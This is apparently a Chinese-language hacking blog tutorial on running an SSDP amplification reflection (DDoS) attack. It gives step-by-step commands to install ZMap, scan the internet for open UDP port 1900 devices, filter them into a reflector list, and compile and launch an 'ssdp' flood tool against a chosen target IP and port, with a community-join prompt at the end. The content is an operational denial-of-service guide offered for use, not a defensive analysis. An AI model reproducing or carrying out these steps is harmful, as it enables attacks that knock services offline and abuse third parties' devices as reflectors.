Loading
0

SSDP放大反射攻击扫描列表教程

1.升级所有包,改变软件设置和系统设置,系统版本内核都升级

yum -y update

2.下载rpm包(区分centos6 与centos7 执行不同的命令)

centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm

centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm

3.安装必要的依赖环境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

--------------------------------------------扫描过滤列表-----------------------------------------------

4.安装Zmap

wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz  
cd /root/zmap-1.0.3
cd /src
make
make install

ZMap安装完成,可以运行如下命令测试:

zmap -p 80 -N 10 -B 1M -o -   #很快,程序会输出10个Internet上打开了80端口的主机的IP,你也可以换成22端口23端口试试。具体的用法可以参考ZMap官方文档。

5.开始扫描SSDP放大列表

screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt
如果在扫描时,你与服务器的会话不小心中断。
你可以重新连接服务器。
使用命令screen -r回到会话。
screen是将程序独立运行在后台,直到执行完成。

6.过滤列表

php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000

--------------------------------------------放大攻击-----------------------------------------------

7.编译软件

软件下载:ssdp.zip

yum install gcc libcap libpcap libpcap-devel #安装环境
gcc -lpthread ssdp.c -lpcap -o ssdp #编译脚本

8.攻击命令

chmod 777 ssdp #赋予权限
./ssdp 127.0.0.1 80 ssdp.txt 100 -1 60


点击加群

本文由A1d4m's blog(www.ychack.com)提供,文章原创版权所有,转载请注明!